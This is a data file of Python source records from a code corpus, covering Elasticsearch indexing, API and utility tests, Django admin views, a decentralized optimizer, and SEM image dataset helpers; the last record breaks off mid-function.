@Software : VSCode\n\nimport pytest\n\n\nclass TestText13Bus:\n\n @pytest.fixture(autouse=True)\n def _request(self, solve_snap_13bus):\n self.dss = solve_snap_13bus\n self.dss.solution_solve()\n\n # ===================================================================\n # String methods\n # ===================================================================\n def test_text(self):\n expected = \"2000\"\n actual = self.dss.text('? Line.650632.Length')\n assert expected == actual\n","sub_path":"tests/py_dss_interface/test_text.py","file_name":"test_text.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"535343986","text":"# -*- coding: utf-8 -*-\n\nimport re\nimport datetime\nimport logging\nimport sys\nimport os\nimport errno\nfrom threading import RLock\n\nfrom cachetools import cached, LRUCache\n\nfrom contexttimer import timer\n\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch.helpers import bulk\nfrom elasticsearch.serializer import JSONSerializer\nfrom elasticsearch.exceptions import SerializationError\n\nimport text_unidecode\nimport ujson\n\nLOGGER = logging.getLogger('app')\n\ncache = LRUCache(maxsize=1000)\nlock = RLock()\n\n\n#################################\n#################################\n\nclass TechnicalSession():\n\t\"\"\"\n\tThis class is dedicated to hosting technical methods on Elasticsearch\n\twhich do not require any Business input (such as lang or industry)\n\t\"\"\"\n\n\tdef __init__(self, hosts=None):\n\n\t\tif not isinstance(hosts, (list, tuple)) or not hosts:\n\t\t\traise RuntimeError('incorrect host configuration')\n\n\t\tself.es = Elasticsearch(hosts=hosts)\n\n\n\tdef create_index(self, index, mapping):\n\t\t\"\"\"\n\t\tcreates an index, throwing IndexAlreadyExistsException if the index\n\t\talready exists\n\n\t\t:Example:\n\t\t>> self.create_index('test', mapping)\n\t\t\"\"\"\n\t\tself.es.indices.create(index=index, body=mapping)\n\n\n\tdef delete_index(self, index):\n\t\tself.es.indices.delete(index, ignore=[400, 404])\n\n\n\tdef health(self):\n\t\treturn self.es.cluster.health(wait_for_status='yellow', request_timeout=1)\n\n\n\nclass QuerySession():\n\n\tdef __init__(self, hosts=None, lang='', industry=''):\n\n\t\tif not isinstance(hosts, (list, tuple)) or not hosts:\n\t\t\traise RuntimeError('incorrect host configuration')\n\n\t\tself.index = f\"catalogs_{industry}_{lang}\"\n\t\tself.index_training = f\"trainings_{industry}_{lang}\"\n\n\t\tself.doc_type = 'document'\n\n\t\tself.es = Elasticsearch(hosts=hosts)\n\n\n\tdef _extract_business_object(self, o):\n\t\t\"\"\"\n\t\tRemove all the ES specifics like '_hits'... 
and focus on the Business Object\n\t\tenriched with the _id and _parent attributes\n\t\t\n\t\t>>> _extract_business_object(doc)\n\t\t>>> {\n\t\t\t'_id' \t\t: 'ABC123',\n\t\t\t'_parent' \t: 'PRODUCTA',\n\t\t\t'type' \t\t: 'review',\n\t\t\t'sentiment' : 'positive',\n\t\t\t'title'\t\t: 'very good',\n\t\t\t'body'\t\t: 'excellent product' \n\t\t}\n\n\t\t\"\"\"\n\n\t\tif not isinstance(o, dict):\n\t\t\traise ValueError('The object is not a dict')\n\t\tif '_id' not in o:\n\t\t\traise KeyError('The object does not contain an _id')\n\t\tif '_source' not in o:\n\t\t\traise KeyError('The object does not contain a _source')\n\t\tsource = o['_source']\n\t\tsource['_id'] = o['_id']\n\t\tif '_parent' in o:\n\t\t\tsource['_parent'] = o['_parent']\n\t\tLOGGER.debug('_extract_business_object {}'.format(source))\n\t\treturn source\n\n\n\n\tdef _exclude_keys(self, dictionnary, exclude_keys):\n\t\t\"\"\"\n\t\tutility function that excludes keys from a dict and returns a clean dict\n\t\t\"\"\"\n\t\tnewd = {}\n\t\tfor k, v in list(dictionnary.items()):\n\t\t\tif k not in exclude_keys:\n\t\t\t\tnewd[k] = v\n\t\treturn newd\n\n\n\n\t# @timer(logger=LOGGER)\n\tdef get(self, id):\n\t\t\"\"\"\n\t\tRetrieves a document, this is useful to check the correct integration of data\n\t\t\n\t\t:Example:\n\n\t\t>>> get('ABC123')\n\t\t>>> {\n\t\t\t'_id' \t\t: 'ABC123',\n\t\t\t'_parent' \t: 'PRODUCTA',\n\t\t\t'type' \t\t: 'review',\n\t\t\t'sentiment' : 'positive',\n\t\t\t'title'\t\t: 'very good',\n\t\t\t'body'\t\t: 'excellent product' \n\t\t}\n\t\t\"\"\"\n\t\tif id is None:\n\t\t\traise ValueError('id cannot be null')\n\t\t\n\t\tresult = self.es.search(\n\t\t\t\t index=self.index,\n\t\t\t\t stored_fields=False,\n\t\t\t\t _source=True,\n\t\t\t\t doc_type=self.doc_type,\n\t\t\t\t body={\n\t\t\t\t\t\t\"query\": {\n\t\t\t\t\t\t\t\"bool\" : { \n\t\t\t \"must\" : [\n\t\t\t {\"term\" : {\"_id\" : id}}\n\t\t\t ]\n\t\t\t }\n\t\t\t\t\t\t},\n\t\t\t\t\t\t\"size\": 1\n\t\t\t \t}\n\t\t\t\t)\n\t\tif result['hits']['total'] > 0:\n\t\t\tLOGGER.debug('getById : {}'.format(result['hits']['hits'][0]))\n\t\t\treturn self._extract_business_object(result['hits']['hits'][0])\n\t\telse:\n\t\t\tLOGGER.warning('Document not found {}'.format(id))\n\t\t\treturn None\n\n\n\t@timer(logger=LOGGER)\n\tdef delete(self, id):\n\t\t\"\"\"Deletes a document from the index\n\t\t\"\"\"\n\t\tif id is None or id.strip() == '':\n\t\t\traise ValueError('id cannot be null')\n\t\t\n\t\tresult = self.es.delete(index=self.index, id=id, doc_type=self.doc_type, refresh=True)\n\t\t\n\t\tif result['_shards']['successful'] == 1:\n\t\t\treturn True\n\t\treturn False\n\n\n\t###############################################################\n\n\t# @timer(logger=LOGGER)\n\tdef upsert_products(self, values):\n\t\t\"\"\"\n\n\t\tUpserts a product and attached reviews\n\n\t\tFor search / faceting purposes, the reviews are stored with the \n\t\t- Product Brand \n\t\t- Product Price\n\t\t- website\n\t\t- category\n\n\t\tThe categories are stored but also concatenated into a new field 'category_name'\n\t\twhich is text safe (using asciifolding)\n\n\t\tA field 'universe' is stored, as the text safe 1st part of the categories array\n\t\tA field 'galaxy' is stored, as the text safe 2nd part of the categories array\t\n\n\t\t\n\t\t\"\"\"\n\n\t\t############################################################################\n\t\t# INNER METHODS\n\t\t############################################################################\n\n\t\tdef _safe_text(text):\n\t\t\t_intermediate = 
text_unidecode.unidecode(text).strip().lower()\n\t\t\tfull = re.sub('[^A-Za-z0-9_.-]+', '', _intermediate)\n\t\t\treturn full\n\n\t\tdef _build_category_name(doc):\n\t\t\t# replace special chars\n\t\t\t# and fold to ascii\n\t\t\tfinal = []\n\t\t\tfor cat in doc['categories']:\n\t\t\t\tfinal.append(_safe_text(cat))\n\t\t\treturn ' '.join(final)\n\n\t\tdef _extract_universe(doc):\n\t\t\tif len(doc['categories']) == 0:\n\t\t\t\treturn ''\n\t\t\treturn _safe_text(doc['categories'][0])\n\n\t\tdef _extract_galaxy(doc):\n\t\t\tif len(doc['categories']) < 2:\n\t\t\t\treturn ''\n\t\t\treturn _safe_text(doc['categories'][1])\n\n\t\tdef _upsert_reviews(reviews=None, product_id=None, refresh_index=True):\n\t\t\t\"\"\"Inner method, should only be called internally \n\t\t\t\"\"\"\n\t\t\tif not isinstance(reviews, (list, tuple)):\n\t\t\t\traise ValueError('Expecting a list of reviews') \n\t\t\t\n\t\t\tupdate = []\n\t\t\tfor item in reviews:\n\t\t\t\tif '_id' not in item:\n\t\t\t\t\t# this review is issued from a scraping, it should\n\t\t\t\t\t# always contain an _id\n\t\t\t\t\traise ValueError('The review must have an _id') \n\t\t\t\tif 'product_review_join' not in item:\n\t\t\t\t\t# maybe this is the first time it is indexed\n\t\t\t\t\t# in this case, the product_id must be passed as param\n\t\t\t\t\tif product_id is None:\n\t\t\t\t\t\traise ValueError('The review has no parent product') \n\t\t\t\telse:\n\t\t\t\t\tproduct_id = item['product_review_join']['parent']\n\t\t\t\t\n\t\t\t\tif 'created' not in item:\n\t\t\t\t\titem.update(created=datetime.datetime.now())\n\n\t\t\t\tdoc = self._exclude_keys(item, ['_id'])\n\t\t\t\tdoc.update(type=\"review\")\n\t\t\t\tdoc.update(product_review_join={'name': 'review', 'parent': product_id})\n\n\t\t\t\tupdate.append({\n\t\t\t\t\t'_type': 'document',\n\t\t\t\t\t'_id': item['_id'],\n\t\t\t\t\t'_op_type': 'index',\n\t\t\t\t\t'_source': doc\n\t\t\t\t})\n\n\t\t\tLOGGER.debug(f\"Indexing reviews {update}\") \n\n\t\t\tupd = bulk(self.es, update, index=self.index, routing=product_id)\n\t\t\t\n\t\t\tif refresh_index:\n\t\t\t\tself.es.indices.refresh(index=self.index)\n\t\t\t\n\t\t\treturn upd\n\n\t\t############################################################################\n\n\t\tif not isinstance(values, (list, tuple)):\n\t\t\traise ValueError('Expecting a list of products') \n\n\t\tupd = {}\n\t\tupdate = []\n\t\trevs = {}\n\t\treviews = None\n\t\trouting = None\n\n\t\tfor item in values:\n\t\t\tif not isinstance(item, dict):\n\t\t\t\traise ValueError('Expecting a dict of values')\n\t\t\tif '_id' not in item:\n\t\t\t\t# the item is already issued from ES\n\t\t\t\t# it should contain an '_id'\n\t\t\t\traise ValueError('Product has neither an _id, nor an id') \n\t\t\tif 'created' not in item:\n\t\t\t\titem.update(created=datetime.datetime.now())\n\t\t\tif 'reviews' in item:\n\t\t\t\treviews = item['reviews']\n\t\t\tif routing is None:\n\t\t\t\t# take the first product id as routing of the packet\n\t\t\t\trouting = item['_id']\n\t\t\t\n\t\t\tdoc = self._exclude_keys(item, ['_id', 'reviews'])\t\n\t\t\tdoc.update(type='product')\t\t\n\t\t\tdoc.update(product_review_join='product')\n\n\t\t\t# calculate the category path and store it\n\t\t\tdoc.update(category_name=_build_category_name(doc))\n\n\t\t\t# extract the universe and store it\n\t\t\tdoc.update(universe=_extract_universe(doc))\n\n\t\t\t# extract the galaxy and store it\n\t\t\tdoc.update(galaxy=_extract_galaxy(doc))\n\n\t\t\tupdate.append({\n\t\t\t\t\t'_type'\t\t: 'document',\n\t\t\t\t\t'_id'\t\t: 
item['_id'],\n\t\t\t\t\t'_op_type'\t: 'index',\n\t\t\t\t\t'_source'\t: doc \n\t\t\t\t})\n\n\t\t\tif reviews is not None:\n\t\t\t\t# enrich the reviews with product info\n\t\t\t\t# to make analytics on reviews\n\t\t\t\t# ex: count reviews for marketplace products\n\t\t\t\tfor r in reviews:\n\t\t\t\t\tr.update(website=doc.get('website'))\n\t\t\t\t\tr.update(category_name=doc.get('category_name'))\n\t\t\t\t\tr.update(universe=doc.get('universe'))\n\t\t\t\t\tr.update(galaxy=doc.get('galaxy'))\n\t\t\t\t\tr.update(price=doc.get('price', 0))\n\t\t\t\t\tr.update(brand=doc.get('brand', ''))\n\t\t\t\t\tr.update(is_marketplace=doc.get('is_marketplace', False))\n\t\t\t\t\tr.update(variants_count=doc.get('variants_count', 0))\n\t\t\t\t\tLOGGER.debug(f\"Enriched review attributes: {r}\")\n\n\t\t# routing is mandatory\n\t\t# to index products and reviews in the same shard for the parent/child relationship\n\t\tif routing is not None:\n\t\t\tLOGGER.debug('Indexing a batch of {} products'.format(len(update))) \n\t\t\tupd = bulk(self.es, update, index=self.index, routing=routing)\n\n\t\t\tif reviews is not None:\n\t\t\t\t# a global refresh will be done afterwards\n\t\t\t\trevs = _upsert_reviews(reviews, product_id=item['_id'], refresh_index=False)\n\t\t\telse:\n\t\t\t\tLOGGER.debug('No review to be indexed') \n\n\t\t\tself.es.indices.refresh(index=self.index)\n\t\telse:\n\t\t\tLOGGER.error('Unable to index reviews, possible routing issue') \n\n\t\treturn {\n\t\t\t'products': upd,\n\t\t\t'reviews': revs,\n\t\t}\n\n\n\t###############################################################\n\n\t\n\t# @timer(logger=LOGGER)\n\tdef upsert_trainings(self, values):\n\t\t\"\"\"\n\t\tUsed to create or update a new training \n\t\t\"\"\"\n\t\tif not isinstance(values, (list, tuple)):\n\t\t\traise ValueError('Expecting a list of trainings') \n\n\t\tinsert = []\n\t\tupdate = []\n\t\tfor item in values:\n\t\t\tif not isinstance(item, dict):\n\t\t\t\traise ValueError(f\"Expecting a dict of values, found {type(item)}\")\n\t\t\tif '_id' in item:\n\t\t\t\tLOGGER.debug(f\"updating the training {item['_id']}\")\n\t\t\t\tid = item['_id']\n\t\t\t\tdoc = self._exclude_keys(item, ['_id'])\n\n\t\t\t\tupdate.append({\n\t\t\t\t\t\t'_type': 'document',\n\t\t\t\t\t\t'_id': id,\n\t\t\t\t\t\t'_op_type': 'index',\n\t\t\t\t\t\t'_source': doc \n\t\t\t\t\t})\n\t\t\telse:\n\t\t\t\t# try to see if a training does not already exist\n\t\t\t\tif 'review_id' in item and item['review_id'] != '':\n\t\t\t\t\ttraining = self.es.search(\n\t\t\t\t\t index=self.index_training,\n\t\t\t\t\t doc_type=self.doc_type,\n\t\t\t\t\t body={\n\t\t\t\t\t\t\t\"query\": {\n\t\t\t\t\t\t\t\t\"bool\" : { \n\t\t\t\t\t \"must\" : [\n\t\t\t\t\t {\"match\" : {\"review_id\" : item['review_id']}}\n\t\t\t\t\t ]\n\t\t\t\t\t }\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\"size\": 1\n\t\t\t\t \t}\n\t\t\t\t\t)\n\t\t\t\t\tif training['hits']['total']:\n\t\t\t\t\t\t# this is an update\n\t\t\t\t\t\tid = training['hits']['hits'][0]['_id']\n\t\t\t\t\t\tLOGGER.debug(f\"upsert training retrieved {id}, will be updated not inserted\")\n\t\t\t\t\t\tupdate.append({\n\t\t\t\t\t\t\t'_type': 'document',\n\t\t\t\t\t\t\t'_id': id,\n\t\t\t\t\t\t\t'_op_type': 'index',\n\t\t\t\t\t\t\t'_source': item \n\t\t\t\t\t\t})\n\t\t\t\t\telse:\n\t\t\t\t\t\t# this is an insert\n\t\t\t\t\t\t# trainings may be created manually\n\t\t\t\t\t\t# an _id is not mandatory\n\t\t\t\t\t\t# in this case a new item is created\n\t\t\t\t\t\tLOGGER.debug(f\"New training entry to be created for {item}\")\n\t\t\t\t\t\titem['created'] = 
datetime.datetime.now()\n\t\t\t\t\t\tinsert.append({\n\t\t\t\t\t\t\t'_type': 'document',\n\t\t\t\t\t\t\t'_source': item \n\t\t\t\t\t\t})\n\n\t\t\t\telse:\n\t\t\t\t\t# this is an insert\n\t\t\t\t\t# trainings may be created manually\n\t\t\t\t\t# an _id is not mandatory\n\t\t\t\t\t# in this case a new item is created\n\t\t\t\t\tLOGGER.debug(f\"New training entry to be created for {item}\")\n\t\t\t\t\titem['created'] = datetime.datetime.now()\n\t\t\t\t\tinsert.append({\n\t\t\t\t\t\t\t'_type': 'document',\n\t\t\t\t\t\t\t'_source': item \n\t\t\t\t\t\t})\n\n\t\tins = bulk(self.es, insert, index=self.index_training)\n\t\tupd = bulk(self.es, update, index=self.index_training)\n\n\t\tself.es.indices.refresh(index=self.index_training)\n\t\t\n\t\treturn {\n\t\t\t'insert': ins,\n\t\t\t'update': upd\n\t\t}\n\n","sub_path":"datafeed/services/elastic_writer.py","file_name":"elastic_writer.py","file_ext":"py","file_size_in_byte":11841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"256785647","text":"# Copyright (c) 2015 Mirantis Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom storyboard.tests import base\n\n\nclass TestDBExceptions(base.FunctionalTest):\n def setUp(self):\n super(TestDBExceptions, self).setUp()\n self.default_headers['Authorization'] = 'Bearer valid_superuser_token'\n\n # test duplicate entry error\n # in this test we try to create two equal projects\n def test_duplicate_project_create(self):\n resource = '/projects'\n project = {\n 'name': 'test-project-duplicate',\n 'description': 'test_project_duplicate_description',\n }\n\n # create project with name 'test-project-duplicate'\n response = self.post_json(resource, project)\n body = response.json\n self.assertEqual(project['name'], body['name'])\n self.assertEqual(project['description'], body['description'])\n\n # repeat creating this project\n # because project with name 'test-project-duplicate' already exists, we\n # wait abort with code_status 400\n response = self.post_json(resource, project, expect_errors=True)\n self.assertEqual(400, response.status_code)\n\n # test duplicate entry error\n # in this test we try to create two equal users\n def test_duplicate_user_create(self):\n # send user first time\n resource = '/users'\n user = {\n 'full_name': 'Test duplicate',\n 'email': 'dupe@example.com'\n }\n\n response = self.post_json(resource, user)\n users_body = response.json\n self.assertEqual(user['full_name'], users_body['full_name'])\n self.assertEqual(user['email'], users_body['email'])\n\n # send user again\n response = self.post_json(resource, user, expect_errors=True)\n self.assertEqual(400, response.status_code)\n","sub_path":"storyboard/tests/api/test_db_exceptions.py","file_name":"test_db_exceptions.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"26314645","text":"# Copyright 2019 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 
2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"\nDescription: This file is used for some common util.\n\"\"\"\nimport io\nimport os\nimport shutil\nimport time\nfrom urllib.parse import urlencode\nimport numpy as np\nfrom PIL import Image\nfrom mindinsight.datavisual.common.enums import DataManagerStatus\n\n\ndef get_url(url, params):\n \"\"\"\n Concatenate the URL and params.\n\n Args:\n url (str): A link requested. For example, http://example.com.\n params (dict): A dict consists of params. For example, {'offset': 1, 'limit':'100}.\n\n Returns:\n str, like http://example.com?offset=1&limit=100\n\n \"\"\"\n\n return url + '?' + urlencode(params)\n\n\ndef delete_files_or_dirs(path_list):\n \"\"\"Delete files or dirs in path_list.\"\"\"\n for path in path_list:\n if os.path.isdir(path):\n shutil.rmtree(path)\n else:\n os.remove(path)\n\n\ndef check_loading_done(data_manager, time_limit=15, first_sleep_time=0):\n \"\"\"If loading data for more than `time_limit` seconds, exit.\"\"\"\n if first_sleep_time > 0:\n time.sleep(first_sleep_time)\n start_time = time.time()\n while data_manager.status != DataManagerStatus.DONE.value:\n time_used = time.time() - start_time\n if time_used > time_limit:\n break\n time.sleep(0.1)\n continue\n\n\ndef get_image_tensor_from_bytes(image_string):\n \"\"\"Get image tensor from bytes.\"\"\"\n img = Image.open(io.BytesIO(image_string))\n image_tensor = np.array(img)\n\n return image_tensor\n","sub_path":"tests/utils/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"379537333","text":"import re\nfrom datetime import datetime, timedelta\n\ntry:\n import cairo\n import pycha.pie\n GRAPH=True\nexcept:\n GRAPH=False\n\nfrom django.db.models import Sum, Q\nfrom django.shortcuts import render_to_response\n\nfrom misc.models import UserAgent, Log\nfrom misc.functions import gen_random_str, render_to_task, fs_space\nfrom utils.decorators import access_required\nfrom settings import PIE_PATH\n\n@access_required\ndef user_agents(request, mode):\n lines = []\n types = UserAgent.objects.all().values_list(\"codename\",flat=True).distinct()\n for type in types:\n lines.append([type, UserAgent.objects.filter(codename=type).aggregate(Sum('count'))[\"count__sum\"]])\n \n if GRAPH:\n link = user_agents_statistics(lines)\n return render_to_response(\"misc/user_agents.django.html\", {\"link\": link})\n else:\n max_count = 0\n for i in lines:\n max_count += i[1]\n \n lines = map(lambda x: (x[0], str(x[1]*100/max_count)+\"%\"), lines)\n return render_to_response(\"misc/user_agents_table.django.html\", {\"lines\": lines})\n\n@access_required\ndef system_logs(request, mode):\n user = request.user\n \n search = request.GET.get(\"value\", None)\n period = request.GET.get(\"period\", None)\n order_by = request.GET.get(\"order_by\", \"date\")\n \n logs = Log.objects.all()\n if period or search:\n template = 
\"misc/log_search.django.html\"\n # Check period format here\n \n if search:\n logs = logs.get(Q(type__icontains=search) | Q(type__icontains=msg))\n else:\n template = \"misc/system_log.django.html\"\n # Default values\n from_ = datetime.now()-timedelta(10)\n till = datetime.now()\n period = \"%s - %s\" % (from_.strftime(\"%d.%m.%y\"), till.strftime(\"%d.%m.%y\"))\n \n if period:\n date_range = []\n str_dates = re.split(\"\\s*-\\s*\", period)\n for str_date in str_dates:\n list_date = re.split(\"\\.\", str_date)\n list_date.reverse()\n year, month, day = map(lambda x: int(x), list_date)\n date_range.append(datetime(year,month,day))\n \n logs = logs.filter(date__range=date_range)\n \n return render_to_response(template, {\"logs\": logs,\n \"period\": period})\n\n#@access_required\ndef system_mon(request):\n return render_to_response(\"misc/system_mon.django.html\", {\"disk_info\": fs_space()})\n\n\ndef user_agents_statistics(lines):\n surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, 400, 400)\n data = [(line[0], [[0, line[1]]]) for line in lines]\n options = {\n 'background': {\n 'hide': True,\n },\n 'legend': {\n 'hide': True,\n },\n 'padding': {\n 'left': 70,\n 'right': 10,\n 'top': 0,\n 'bottom': 0,\n },\n\n }\n chart = pycha.pie.PieChart(surface, options)\n chart.addDataset(data)\n chart.render()\n name = gen_random_str(5)\n surface.write_to_png(PIE_PATH % name)\n render_to_task(\"rm -f %s\" % (PIE_PATH % name), \"now+5minutes\")\n return \"/media/stat/%s.png\" % name\n","sub_path":"misc/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"522680354","text":"#!/usr/bin/env python\n# coding=utf-8\nimport numpy as np\n\nfrom .decentralized_optimizer import DecentralizedOptimizer\n\nclass DGD_tracking(DecentralizedOptimizer):\n '''The distributed gradient descent algorithm with gradient tracking, described in 'Harnessing Smoothness to Accelerate Distributed Optimization', Guannan Qu, Na Li'''\n\n def __init__(self, p, eta=0.1, **kwargs):\n super().__init__(p, **kwargs)\n self.eta = eta\n self.grad_last = None\n\n\n def init(self):\n super().init()\n self.s = np.zeros((self.p.dim, self.p.n_agent))\n for i in range(self.p.n_agent):\n self.s[:, i] = self.grad(self.x[:, i], i)\n\n self.grad_last = self.s.copy()\n\n\n def update(self):\n self.n_comm[self.t] += 1\n\n x_last = self.x.copy()\n y = self.x.dot(self.W)\n self.x = y - self.eta * self.s\n\n self.s = self.s.dot(self.W_s)\n # for i in range(self.p.n_agent):\n # self.s[:, i] += self.grad(self.x[:, i], i) - self.p.grad(x_last[:, i], i) # Don't count the last gradient evaluation!\n self.s -= self.grad_last\n for i in range(self.p.n_agent):\n self.grad_last[:, i] = self.grad(self.x[:, i], i)\n self.s += self.grad_last\n \n","sub_path":"optimizers/decentralized_distributed/DGD_tracking.py","file_name":"DGD_tracking.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"403055916","text":"import numpy as np\nimport pandas as pd\nimport math\nimport re\nfrom PIL import Image\n\n\ndef img_info(fname, fields):\n '''\n Gets condensed SEM image name and info\n Inputs : fname (str, SEM image filename)\n fields (list of strings for data categories or \"default\")\n Outputs : info_dict (dictionary of from filename)\n '''\n #\n if fields == \"default\":\n fields = [\"Material\", \"Magnification\", \"Resolution\", \"HFW\",\n 
\"StartingMaterial\", \"CalcinationTemp\", \"CalcinationTime\",\n \"AgingTime\", \"AgingTemp\", \"AgingHumidity\", \"AgingOxygen\",\n \"Impurity\", \"ImpurityConcentration\", \"Detector\",\n \"Coating\", \"Replicate\", \"Particle\", \"Image\", \"AcquisitionDate\"]\n # Fill dictionary from filename and data fields\n info_dict = {}\n info = re.split('_', fname)\n # Correctly labeled images\n if (len(info) == len(fields)):\n for i in range(0, len(fields)-1):\n info_dict[fields[i]] = info[i]\n # Alpha and UO3 split by underscore\n elif (len(info) == len(fields)+1) and (info[0]=='Alpha'):\n info[0] = info[0] + '-' + info[1]\n info.remove(info[1])\n for i in range(0, len(fields)-1):\n info_dict[fields[i]] = info[i]\n # Am and UO3 split by underscore\n elif (len(info) == len(fields)+1) and (info[0]=='Am'):\n info[0] = info[0] + '-' + info[1]\n info.remove(info[1])\n for i in range(0, len(fields)-1):\n info_dict[fields[i]] = info[i]\n # Single missing field\n elif (len(info) == len(fields)-1):\n info.append('NA')\n for i in range(0, len(fields)-1):\n info_dict[fields[i]] = info[i]\n # Date split by underscore or voltage included\n elif (len(info) > len(fields)) and (info[0]!='Alpha') and (info[0]!='Am'):\n info = info[0:19]\n for i in range(0, len(fields)-1):\n info_dict[fields[i]] = info[i]\n # No exception found\n else:\n print(fname, 'does not contain enough fields')\n for i in range(0, len(fields)-1):\n info_dict[fields[i]] = 'x'\n # \n info_dict['Image'] = info_dict['Image'][0:3]\n info_dict['FileName'] = fname\n # Return image id and info as dictionary\n return info_dict\n\n\ndef convert_fname(fname, fields):\n '''\n Converts project 1 filenames to other scheme\n '''\n # Fill dictionary from filename and data fields\n idict = {}\n info = re.split('_', fname)\n for i in range(0, len(fields)-1):\n idict[fields[i]] = info[i]\n # Get HFW from magnification\n if idict['Magnification'] == '10000x':\n hfw = '30.6um'\n elif idict['Magnification'] == '25000x':\n hfw = '12.3um'\n elif idict['Magnification'] == '50000x':\n hfw = '6.13um'\n elif idict['Magnification'] == '100000x':\n hfw = '3.06um'\n else:\n hfw = 'NA'\n # Create new filename\n new_fname = idict['Material'] + '_' + idict['Magnification'] + '_'\n new_fname += '1024x934_' + hfw + '_' + idict['Precipitate'] + '_'\n new_fname += idict['CalcinationTemp'] + '_' + idict['CalcinationTime'] + '_'\n new_fname += 'NA_NA_NA_NA_'\n new_fname += idict['Ore'] + '-' + idict['Leach'] + '-' + idict['Purification']\n new_fname += '_NA_TLD_NoCoat_' + idict['Replicate'][-1] + '_' + idict['Particle'][-1] + '_'\n new_fname += idict['Image'][0:3] + '_' + 'NA.tif'\n # Return image id and info as dictionary\n return new_fname\n\n\ndef quick_filter(df, filt_dict):\n '''\n Returns filtered dataframe from info in dictionary\n Inputs : df (pd DataFrame)\n filt_dict (dict['key']=[list, of, valid, values])\n Outputs : filt_df\n '''\n new_df = df\n for key in filt_dict:\n new_df = new_df[new_df[key]==filt_dict[key]]\n return new_df\n\n\ndef json2df(dpath, dfiles):\n '''\n Returns filtered dataframe from info in dictionary\n Inputs : dpath (str, path to datafiles)\n dfiles (list of filenames to import)\n Outputs : concatenated dataframes\n '''\n df_list = []\n for item in dfiles:\n fname = dpath + '/' + item\n temp_df = pd.read_json(fname, orient='index', dtype=True)\n df_list.append(temp_df)\n return pd.concat(df_list)\n\n\ndef split_dataset(dataframe, test_split, k, seed):\n '''\n Splits dataset into test, train, and cross val. 
sets\n    Inputs:  dataframe: df of split image names, labels\n             test_split: size of test set (float 0 to 1)\n             k: number of cv folds (integer)\n             seed: random state (integer)\n    Outputs: test_df: df of all test ids, labels\n             train_df: df of all train ids, labels\n             cv_df: train_df w/ fold labels added\n    Usage:   te_df, tr_df, cv_df = split_dataset(all_df, 0.2, 5, 42)\n    '''\n    # Split parent df, create train/test dfs\n    train_df = dataframe.sample(frac=(1-test_split), random_state=seed)\n    test_df = dataframe.drop(train_df.index)\n    # Copy and shuffle train_df, reset indexes\n    cv_df = train_df.sample(frac=1, random_state=seed)\n    df_len = len(cv_df)\n    # Create k=cv_folds cross validation sets\n    val_list = [0] * df_len\n    for fold in list(range(k)):\n        idx1 = int(fold * df_len / k)\n        idx2 = idx1 + int(df_len / k)\n        for idx in range(idx1, idx2):\n            val_list[idx] = fold\n    cv_df['fold'] = val_list\n    return test_df, train_df, cv_df\n\n\ndef stratified_split(df, label_col, test_split, balance, k, seed):\n    '''\n    Stratified train/test split with oversampled training data\n    Inputs:  df: dataframe of split image names, labels\n             label_col : column of dataframe (str)\n             test_split: size of test set (float 0 to 1)\n             balance: training data imbalance (float 0 to 1)\n                      (# in each class / # largest class)\n             k: number of cv folds (integer)\n             seed : random state (integer)\n    Outputs: test_df: df of all test ids, labels\n             train_df: df of all train ids, labels\n             cv_df: train_df w/ fold labels added\n    Usage:   te_df, tr_df, cv_df = stratified_split(df, label_col, 0.2, 0.8, 5, 42)\n    '''\n    # Stratified test split\n    test_dfs = []\n    for label in df[label_col].unique():\n        temp_df = df[df[label_col]==label]\n        test_dfs.append(temp_df.sample(frac=test_split,random_state=seed))\n    test_df = pd.concat(test_dfs)\n    test_df = test_df.sample(frac=1.0,random_state=seed)\n    # Remove test images from df, leaving unique training images\n    utrain_df = df.drop(test_df.index)\n    # Create k stratified cross validation sets\n    cv_dfs = []\n    for fold in list(range(k)):\n        label_dfs = []\n        for label in df[label_col].unique():\n            temp_df = utrain_df[utrain_df[label_col]==label]\n            n_label = len(temp_df)\n            n_sample = int(n_label / (k-fold))\n            label_dfs.append(temp_df.sample(n=n_sample,random_state=seed))\n        fold_df = pd.concat(label_dfs)\n        utrain_df = utrain_df.drop(fold_df.index)\n        fold_df['fold'] = fold\n        cv_dfs.append(fold_df)\n    cv_df = pd.concat(cv_dfs)\n    # Oversample each fold, join\n    oversampled_dfs = []\n    for fold in list(range(k)):\n        fold_df = cv_df[cv_df['fold']==fold]\n        new_fold_df = oversample(fold_df, label_col, balance)\n        new_fold_df = new_fold_df.sample(frac=1.0,random_state=seed)\n        oversampled_dfs.append(new_fold_df)\n    new_cv_df = pd.concat(oversampled_dfs)\n    train_df = new_cv_df.drop(columns=['fold'])\n    return test_df, train_df, new_cv_df\n\n\ndef oversample(df, 